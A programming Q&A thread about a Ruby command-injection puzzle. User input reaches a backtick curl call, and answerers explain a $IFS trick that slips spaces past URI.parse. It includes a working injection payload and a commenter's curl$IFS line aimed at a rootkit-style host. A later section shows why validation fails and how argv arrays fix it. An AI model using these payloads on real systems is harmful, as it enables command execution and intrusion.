
I've been learning about remote/arbitrary command execution. In doing so, I came across some Ruby I thought would be fun to try and exploit.

I've been somewhat successful as I managed to get it to run the 'ls' command, but I can't work out how to add space characters into my commands. If I add a space in, the parse method that URI calls throws an exception.

Here's the code I was trying to exploit:

injection = "www.google.com';ls;#"   # attacker-controlled input

require 'uri'
URI.parse(injection)                 # raises on whitespace, but ' ; and # are legal URI characters
puts `curl '#{injection}'`           # interpolated into a shell command line: the injection point

So your challenge, should you choose to accept it, is to run an 'ls -l' command instead of 'ls' by only changing the injection string. You may not change anything but the first line.

Things I've tried:

ls%2f-l   # Doesn't raise an exception, but unix doesn't unescape CGI encodings.
ls\x20-l  # Raises an exception because Ruby parses the UTF-8.

# Other various escape combinations (\\x20, etc.)

Maybe it's not possible?

Thanks

Chris

2 Answers

You can use the Internal Field Separator (<space><tab><newline>). Since this is what the shell separates with anyway, it will accept it as a separator.

injection = "www.google.com';ls$IFS-l;#"

(BTW, thanks for a nice Saturday night puzzle.)

Rob Napier
  • Any idea why this doesn't work with other commands such as echo and curl? e.g. curl$IFShttp://some.rootkit.com – Chris Sep 02 '12 at 10:34
  • See http://stackoverflow.com/questions/12235373/using-the-internal-field-separator-with-curl – Chris Sep 02 '12 at 10:57
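An added example (not code from the question or either answer) showing why URI.parse does not stop the $IFS payload from the answer above, and why the fix is to take the shell out of the picture rather than to validate harder. The inputs are constructed and the function names are my own.

```ruby
require 'uri'
require 'open3'

# Constructed inputs: a benign URL, the answer's $IFS payload, and the same
# payload placed inside a syntactically valid absolute URL.
BENIGN    = 'http://www.example.com/'
PAYLOAD   = "www.google.com';ls$IFS-l;#"
VALID_BAD = "http://www.example.com/';ls$IFS-l;#"

# URI.parse is a syntax check, not a sanitiser: ' ; and $ are legal RFC 3986
# sub-delimiters, so all three strings above parse without raising.
def parses?(str)
  URI.parse(str)
  true
rescue URI::InvalidURIError
  false
end

# Stricter validation: only absolute http(s) URIs with a host. This rejects
# the bare payload, but VALID_BAD still passes, so validation alone is not enough.
def safe_url(str)
  uri = URI.parse(str)
  return nil unless uri.is_a?(URI::HTTP) && uri.host && !uri.host.empty?
  uri.to_s
rescue URI::InvalidURIError
  nil
end

# The actual fix: build an argv array and never interpolate into a shell
# command. Even VALID_BAD is then a single argument to curl; no $IFS
# expansion and no ';' command splitting can happen.
def curl_argv(str)
  url = safe_url(str)
  url && ['curl', '--', url]
end

# Side by side on a harmless command: backticks (the question's pattern) hand
# the string to /bin/sh, which expands $IFS and word-splits the result, while
# Open3 with an argv array execs printf directly and the string stays literal.
def via_shell(str)
  `printf '%s' #{str}`
end

def via_argv(str)
  out, _status = Open3.capture2('printf', '%s', str)
  out
end
```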

Yes - it's possible. Just put your string in quotes:

1) from a command prompt:

two strings # No quote: the shell sees two strings

"one string" # with single (') or double quotes (") the shell sees only one string

2) from a string literal

mystring = "\"this will be interpreted as one string\"";

paulsm4
  • I'm not really sure this is what I'm after. How could this be used to change the injection string to run an ls -l ? – Chris Sep 02 '12 at 00:43